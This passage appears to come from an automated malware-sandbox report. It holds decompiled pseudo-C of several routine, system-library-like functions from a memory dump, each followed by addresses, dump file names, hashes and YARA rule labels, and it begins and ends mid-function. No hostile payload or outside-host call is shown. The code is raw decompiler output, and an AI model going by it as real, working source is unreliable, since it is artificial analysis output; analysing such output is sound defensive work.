				signed char _t183;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				void* _t191;
				void* _t197;

				_t137 = __ecx;
				_push(0x64);
				_push(0x3921070);
				E0389D08C(__ebx, __edi, __esi);
				 *(_t191 - 0x24) = __edx;
				 *((intOrPtr*)(_t191 - 0x20)) = __ecx;
				 *((intOrPtr*)(_t191 - 0x38)) = __ecx;
				_t135 = 0;
				 *(_t191 - 0x40) = 0;
				_t171 =  *((intOrPtr*)(__ecx + 0xc));
				_t189 =  *(__ecx + 8);
				 *(_t191 - 0x28) = _t189;
				 *((intOrPtr*)(_t191 - 0x3c)) = _t171;
				 *(_t191 - 0x50) = _t189;
				_t187 = __edx << 0xf;
				 *(_t191 - 0x4c) = _t187;
				_t190 = 0x8000;
				 *(_t191 - 0x34) = 0x8000;
				_t172 = _t171 - _t187;
				if(_t172 <= 0x8000) {
					_t190 = _t172;
					 *(_t191 - 0x34) = _t172;
				}
				 *(_t191 - 0x68) = _t135;
				 *(_t191 - 0x64) = _t135;
				L3:
				while(1) {
					if( *(_t191 + 8) != 0) {
						L22:
						 *(_t191 + 8) = _t135;
						E0391337F(_t137, 1, _t191 - 0x74);
						_t97 =  *((intOrPtr*)(_t191 - 0x20));
						_t175 =  *(_t97 + 0x14);
						 *(_t191 - 0x58) = _t175;
						_t139 = _t97 + 0x14;
						 *(_t191 - 0x44) = _t139;
						_t197 = _t175 - 0xffffffff;
						if(_t197 == 0) {
							 *_t139 =  *(_t191 - 0x24);
							E039133B6(_t191 - 0x74);
							 *(_t191 - 0x40) = 1;
							_t60 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
							_t101 =  *_t60;
							_t141 =  *(_t191 - 0x24);
							asm("bt [eax], ecx");
							_t103 = (_t101 & 0xffffff00 | __eflags > 0x00000000) & 0x000000ff;
							if(__eflags == 0) {
								goto L41;
							} else {
								_t103 = _t187 - 1 + _t190;
								__eflags = _t187 - 1 + _t190 -  *((intOrPtr*)(_t191 - 0x3c));
								if(_t187 - 1 + _t190 >=  *((intOrPtr*)(_t191 - 0x3c))) {
									goto L41;
								} else {
									__eflags = _t190 - 1;
									if(__eflags > 0) {
										_t143 =  *(_t191 - 0x28);
										_t178 = _t143 + (_t187 >> 5) * 4;
										_t144 = _t143 + (_t187 - 1 + _t190 >> 5) * 4;
										 *(_t191 - 0x50) = _t144;
										_t112 =  *_t178;
										 *(_t191 - 0x54) = _t112;
										_t113 = _t112 | 0xffffffff;
										__eflags = _t178 - _t144;
										if(_t178 != _t144) {
											_t103 = _t113 << _t187;
											__eflags =  *_t178 & _t103;
											if(( *_t178 & _t103) != 0) {
												goto L41;
											} else {
												_t103 =  *(_t191 - 0x50);
												while(1) {
													_t178 =  &(_t178[1]);
													__eflags = _t178 - _t103;
													if(_t178 == _t103) {
														break;
													}
													__eflags =  *_t178 - _t135;
													if( *_t178 != _t135) {
														goto L41;
													} else {
														continue;
													}
													goto L42;
												}
												_t103 = (_t103 | 0xffffffff) >>  !(_t187 - 1 + _t190);
												__eflags = _t103;
												_t149 =  *_t178;
												goto L38;
											}
										} else {
											_t154 = 0x20;
											_t103 = _t113 >> _t154 - _t190 << _t187;
											_t149 =  *(_t191 - 0x54);
											L38:
											_t150 = _t149 & _t103;
											__eflags = _t150;
											asm("sbb cl, cl");
											_t135 =  ~_t150 + 1;
											_t141 =  *(_t191 - 0x24);
											goto L39;
										}
									} else {
										if(__eflags != 0) {
											goto L41;
										} else {
											_t103 =  *(_t191 - 0x28);
											asm("bt [eax], edi");
											if(__eflags >= 0) {
												L40:
												_t136 =  *((intOrPtr*)(_t191 - 0x20));
												asm("lock btr [eax], ecx");
												 *((intOrPtr*)(_t191 - 0x60)) = (_t141 << 0xc) +  *((intOrPtr*)(_t136 + 8));
												 *((intOrPtr*)(_t191 - 0x5c)) = 0x1000;
												_push(0x4000);
												_push(_t191 - 0x5c);
												_push(_t191 - 0x60);
												_push(0xffffffff);
												_t103 = E038896E0();
											} else {
												L39:
												__eflags = _t135;
												if(_t135 == 0) {
													goto L41;
												} else {
													goto L40;
												}
											}
										}
									}
								}
							}
						} else {
							E039133B6(_t191 - 0x74);
							_t172 = _t191 - 0x58;
							E0387E18B( *(_t191 - 0x44), _t172, 4, _t135,  *0x3935880);
							_t51 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
							_t121 =  *_t51;
							asm("bt [eax], ecx");
							_t103 = (_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff;
							if(((_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff) == 0) {
								goto L41;
							} else {
								_t137 =  *((intOrPtr*)(_t191 - 0x20));
								continue;
							}
						}
					} else {
						 *(_t191 - 4) = _t135;
						_t103 = _t187 - 1 + _t190;
						 *(_t191 - 0x30) = _t103;
						if(_t103 <  *((intOrPtr*)(_t191 - 0x3c))) {
							__eflags = _t190 - 1;
							if(__eflags > 0) {
								_t179 =  *(_t191 - 0x28);
								_t161 = _t179 + (_t187 >> 5) * 4;
								 *(_t191 - 0x2c) = _t161;
								_t128 = _t179 + ( *(_t191 - 0x30) >> 5) * 4;
								 *(_t191 - 0x44) = _t128;
								_t180 =  *_t161;
								__eflags = _t161 - _t128;
								if(_t161 != _t128) {
									_t103 = (_t128 | 0xffffffff) << _t187;
									__eflags = _t103 & _t180;
									if((_t103 & _t180) != 0) {
										goto L5;
									} else {
										_t130 =  *(_t191 - 0x2c);
										_t164 =  *(_t191 - 0x44);
										while(1) {
											_t130 = _t130 + 4;
											 *(_t191 - 0x2c) = _t130;
											_t180 =  *_t130;
											__eflags = _t130 - _t164;
											if(_t130 == _t164) {
												break;
											}
											__eflags = _t180;
											if(_t180 == 0) {
												continue;
											} else {
												goto L5;
											}
											goto L19;
										}
										_t103 = (_t130 | 0xffffffff) >>  !( *(_t191 - 0x30));
										__eflags = _t103;
										goto L17;
									}
								} else {
									_t167 = 0x20;
									_t103 = (_t128 | 0xffffffff) >> _t167 - _t190 << _t187;
									L17:
									_t183 =  ~(_t180 & _t103);
									asm("sbb dl, dl");
									goto L18;
								}
							} else {
								if(__eflags != 0) {
									goto L5;
								} else {
									_t103 =  *(_t191 - 0x28);
									asm("bt [eax], edi");
									_t183 =  ~(_t172 & 0xffffff00 | __eflags > 0x00000000);
									asm("sbb dl, dl");
									L18:
									_t181 = _t183 + 1;
									__eflags = _t181;
								}
							}
						} else {
							L5:
							_t181 = _t135;
						}
						L19:
						 *(_t191 - 0x19) = _t181;
						_t163 = _t181 & 0x000000ff;
						 *(_t191 - 0x48) = _t163;
						 *(_t191 - 4) = 0xfffffffe;
						if(_t163 == 0) {
							L41:
							_t136 =  *((intOrPtr*)(_t191 - 0x20));
						} else {
							_t137 =  *((intOrPtr*)(_t191 - 0x20));
							goto L22;
						}
					}
					L42:
					__eflags =  *(_t191 - 0x40);
					if( *(_t191 - 0x40) != 0) {
						_t91 = _t136 + 0x14; // 0x14
						_t142 = _t91;
						 *_t91 = 0xffffffff;
						__eflags = 0;
						asm("lock or [eax], edx");
						_t103 = E0387DFDF(_t91, 1, _t142);
					}
					return E0389D0D1(_t103);
				}
			}

0x03911d55
0x03911d55
0x03911d57
0x03911d5c
0x03911d63
0x03911d66
0x03911d69
0x03911d6c
0x03911d6e
0x03911d71
0x03911d74
0x03911d77
0x03911d7a
0x03911d7d
0x03911d82
0x03911d85
0x03911d88
0x03911d8d
0x03911d90
0x03911d94
0x03911d96
0x03911d98
0x03911d98
0x03911d9b
0x03911d9e
0x00000000
0x03911da1
0x03911da5
0x03911e78
0x03911e78
0x03911e82
0x03911e87
0x03911e8a
0x03911e8d
0x03911e92
0x03911e95
0x03911e98
0x03911e9b
0x03911ede
0x03911ee3
0x03911ee8
0x03911ef2
0x03911ef2
0x03911ef5
0x03911ef8
0x03911efe
0x03911f03
0x00000000
0x03911f09
0x03911f0c
0x03911f0e
0x03911f11
0x00000000
0x03911f17
0x03911f17
0x03911f1a
0x03911f31
0x03911f34
0x03911f3f
0x03911f42
0x03911f45
0x03911f47
0x03911f4a
0x03911f4d
0x03911f4f
0x03911f63
0x03911f65
0x03911f67
0x00000000
0x03911f69
0x03911f69
0x03911f72
0x03911f72
0x03911f75
0x03911f77
0x00000000
0x00000000
0x03911f6e
0x03911f70
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x03911f70
0x03911f83
0x03911f83
0x03911f85
0x00000000
0x03911f85
0x03911f51
0x03911f53
0x03911f5a
0x03911f5c
0x03911f87
0x03911f87
0x03911f87
0x03911f8b
0x03911f8d
0x03911f90
0x00000000
0x03911f90
0x03911f1c
0x03911f1c
0x00000000
0x03911f22
0x03911f22
0x03911f25
0x03911f28
0x03911f97
0x03911f97
0x03911f9d
0x03911fa7
0x03911faa
0x03911fb1
0x03911fb9
0x03911fbd
0x03911fbe
0x03911fc0
0x03911f2a
0x03911f93
0x03911f93
0x03911f95
0x00000000
0x00000000
0x00000000
0x00000000
0x03911f95
0x03911f28
0x03911f1c
0x03911f1a
0x03911f11
0x03911e9d
0x03911ea0
0x03911eae
0x03911eb4
0x03911ebc
0x03911ebc
0x03911ec2
0x03911ec8
0x03911ecd
0x00000000
0x03911ed3
0x03911ed3
0x00000000
0x03911ed3
0x03911ecd
0x03911dab
0x03911dab
0x03911db1
0x03911db3
0x03911db9
0x03911dbf
0x03911dc2
0x03911dda
0x03911ddd
0x03911de0
0x03911de9
0x03911dec
0x03911def
0x03911df1
0x03911df3
0x03911e0a
0x03911e0c
0x03911e0e
0x00000000
0x03911e10
0x03911e10
0x03911e13
0x03911e16
0x03911e16
0x03911e19
0x03911e1c
0x03911e1e
0x03911e20
0x00000000
0x00000000
0x03911e22
0x03911e24
0x00000000
0x03911e26
0x00000000
0x03911e26
0x00000000
0x03911e24
0x03911e30
0x03911e30
0x00000000
0x03911e30
0x03911df5
0x03911df7
0x03911e01
0x03911e32
0x03911e34
0x03911e36
0x00000000
0x03911e36
0x03911dc4
0x03911dc4
0x00000000
0x03911dc6
0x03911dc6
0x03911dc9
0x03911dcf
0x03911dd1
0x03911e38
0x03911e38
0x03911e38
0x03911e38
0x03911dc4
0x03911dbb
0x03911dbb
0x03911dbb
0x03911dbb
0x03911e3a
0x03911e3a
0x03911e3d
0x03911e40
0x03911e43
0x03911e6f
0x03911fc7
0x03911fc7
0x03911e75
0x03911e75
0x00000000
0x03911e75
0x03911e6f
0x03911fca
0x03911fca
0x03911fce
0x03911fd0
0x03911fd0
0x03911fd3
0x03911fd9
0x03911fde
0x03911fe4
0x03911fe4
0x03911fee
0x03911fee

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7d72f47b2f5164a9724bb4d36e8a198baa6e6d666d8be25c9bea6e93e4d1364
Instruction ID: 8438048e945f7c9ea70b62c5750ed764b015b16fe62c5242462cece84159991a
Opcode Fuzzy Hash: a7d72f47b2f5164a9724bb4d36e8a198baa6e6d666d8be25c9bea6e93e4d1364
Instruction Fuzzy Hash: 1D817C35E0021D9FCF18CFA8C880AECB7B6FF49354B184269E112BB385DB319956CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0384C600, Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0384C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x393d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E03856D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0388B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x3937b9c; // 0x0
					_t74 = L03864620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E03889650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L038677F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0388F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E038813C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L038677F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E03889650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x0384c608
0x0384c615
0x0384c625
0x0384c62d
0x0384c635
0x0384c640
0x0384c680
0x0384c687
0x0384c688
0x0384c689
0x0384c694
0x0384c694
0x0384c642
0x0384c64a
0x0384c697
0x038b7a25
0x038b7a2b
0x038b7a2e
0x038b7a30
0x038b7bea
0x038b7bea
0x00000000
0x038b7bea
0x038b7a36
0x038b7a43
0x038b7a48
0x038b7a4c
0x038b7a4e
0x00000000
0x00000000
0x038b7a58
0x038b7a5a
0x038b7a5b
0x038b7a5c
0x038b7a5d
0x038b7a63
0x038b7a64
0x038b7a6a
0x038b7a6c
0x038b7a6e
0x038b79cb
0x038b79cb
0x038b79ce
0x038b79d0
0x038b7a98
0x038b7a9b
0x038b7a9b
0x038b7a9e
0x038b7aa1
0x038b7bbe
0x038b7bbe
0x038b7bc0
0x038b7be0
0x038b7be0
0x038b7a01
0x038b7a01
0x038b7a05
0x038b7a07
0x038b7a15
0x038b7a15
0x038b7a1a
0x00000000
0x038b7a1a
0x038b7bc2
0x038b7bc6
0x038b7bc9
0x038b7bcd
0x038b7bcf
0x038b79e6
0x038b79e6
0x038b79eb
0x038b79eb
0x038b79ef
0x038b79f1
0x00000000
0x00000000
0x038b79f3
0x038b79f5
0x038b79ff
0x038b79ff
0x00000000
0x038b79ff
0x038b79f7
0x038b79fd
0x00000000
0x00000000
0x00000000
0x038b79fd
0x038b7bd5
0x038b7bd8
0x00000000
0x00000000
0x038b7ba9
0x038b7bac
0x038b7bb0
0x038b7bb1
0x038b7bb1
0x038b7bb6
0x00000000
0x038b7bb6
0x038b7aa7
0x038b7aaa
0x00000000
0x00000000
0x038b7ab2
0x038b7ab3
0x038b7ab5
0x038b7aec
0x038b7aef
0x038b7b25
0x038b7b28
0x038b7b62
0x038b7b64
0x038b7b8f
0x038b7b92
0x038b7b96
0x038b7b98
0x00000000
0x00000000
0x038b7b9e
0x038b7b9f
0x038b7ba3
0x00000000
0x038b7ba3
0x038b7b66
0x038b7b68
0x038b7ae2
0x038b7ae2
0x00000000
0x038b7ae2
0x038b7b6e
0x038b7b72
0x038b7b75
0x038b7b81
0x038b7b85
0x038b7b87
0x00000000
0x00000000
0x038b7b31
0x038b7b34
0x038b7b3c
0x038b7b45
0x038b7b46
0x038b7b4f
0x038b7b51
0x038b7b57
0x038b7b59
0x038b7b59
0x00000000
0x038b7b59
0x038b7b77
0x00000000
0x038b7b77
0x038b7b2a
0x00000000
0x038b7b2a
0x038b7af1
0x038b7af3
0x00000000
0x00000000
0x038b7afb
0x038b7afc
0x038b7afe
0x00000000
0x00000000
0x038b7b00
0x038b7b03
0x00000000
0x00000000
0x038b7b05
0x038b7b09
0x038b7b0d
0x038b7b0f
0x00000000
0x00000000
0x038b7b18
0x038b7b1d
0x00000000
0x038b7b1d
0x038b7ab7
0x038b7ab9
0x00000000
0x00000000
0x038b7abf
0x038b7ac1
0x00000000
0x00000000
0x038b7ac3
0x038b7ac6
0x00000000
0x00000000
0x038b7ac8
0x038b7acc
0x038b7ad0
0x038b7ad2
0x00000000
0x00000000
0x038b7adb
0x00000000
0x038b7adb
0x038b79d6
0x038b79d9
0x038b79dc
0x038b7a91
0x038b7a94
0x00000000
0x038b7a94
0x038b79e2
0x00000000
0x038b79e2
0x038b7a74
0x038b7a7a
0x00000000
0x00000000
0x038b7a8a
0x038b7a21
0x038b7a21
0x00000000
0x038b7a21
0x0384c650
0x0384c651
0x0384c656
0x0384c65c
0x0384c65d
0x0384c663
0x0384c664
0x0384c66a
0x0384c66e
0x038b79c5
0x038b79c7
0x00000000
0x038b79c7
0x0384c67a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b9ce706ad6ee3b5a19d38257b88a1fa7d701c6df24be721d84f7efd9c1ba92e
Instruction ID: 814fbb2067074b836e3afecfcf2bb5952edc82e90eea00f24c5111388ab79474
Opcode Fuzzy Hash: 7b9ce706ad6ee3b5a19d38257b88a1fa7d701c6df24be721d84f7efd9c1ba92e
Instruction Fuzzy Hash: 9F818E75604346DBDB25CE94C880AAAB7B8EFC4254F2848EAFD55DB340D335ED44CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 038C6DC9, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E038C6DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L03864620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E038C6B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E03867D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E03889AE0();
					_t87 = L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E038C795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E038C795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E038C795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E038C795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L03864620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E038C6B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E038C6B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E038C6B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E038C6B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E03867D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E03889AE0();
								L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L03862400( &_v36);
							if(_v24 >= 0) {
								_t87 = L03862400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L03862400( &_v52);
							}
							if(_v28 >= 0) {
								return L03862400( &_v60);
							}
						}
					}
				}
				return _t87;
			}

0x038c6dd4
0x038c6dde
0x038c6de1
0x038c6de3
0x038c6de6
0x038c6de9
0x038c6dec
0x038c6def
0x038c6df2
0x038c6df5
0x038c6dfe
0x038c6e04
0x038c6e09
0x038c6e0d
0x038c6e18
0x038c6e1b
0x038c6e22
0x038c6e2d
0x038c6e30
0x038c6e36
0x038c6e42
0x038c6e4d
0x038c6e50
0x038c6e55
0x038c6e5c
0x038c6e6e
0x038c6e5e
0x038c6e67
0x038c6e67
0x038c6e73
0x038c6e74
0x038c6e77
0x038c6e7c
0x038c6e7d
0x038c6e8e
0x038c6e93
0x038c6e9c
0x038c6ea8
0x038c6eab
0x038c6eac
0x038c6eb3
0x038c6ecd
0x038c6edc
0x038c6ee2
0x038c6ee5
0x038c6ef2
0x038c6efb
0x038c6f01
0x038c6f06
0x038c6f0b
0x038c6f11
0x038c6f1a
0x038c6f22
0x038c6f26
0x038c6f26
0x038c6f33
0x038c6f41
0x038c6f44
0x038c6f47
0x038c6f54
0x038c6f65
0x038c6f77
0x038c6f7c
0x038c6f82
0x038c6f91
0x038c6f99
0x038c6fa3
0x038c6fae
0x038c6fae
0x038c6fba
0x038c6fbb
0x038c6fbc
0x038c6fc1
0x038c6fc2
0x038c6fd3
0x038c6fd8
0x038c6fd8
0x038c6fdf
0x038c6fe8
0x038c6fee
0x038c6fee
0x038c6ff5
0x038c6ffb
0x038c6ffb
0x038c7004
0x00000000
0x038c700a
0x038c7004
0x038c6eb3
0x038c6e9c
0x038c7015

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: 6a1d890c41dd0360cbcfdcf5f8a50f6fe60c7ed5379f815e161c26dc5d55eb9f
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: 67718F75A10249AFCB10DFE8C980AEEFBB8FF48314F1445A9E505EB250E734EA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 038DB8D0, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E038DB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x3937b9c; // 0x0
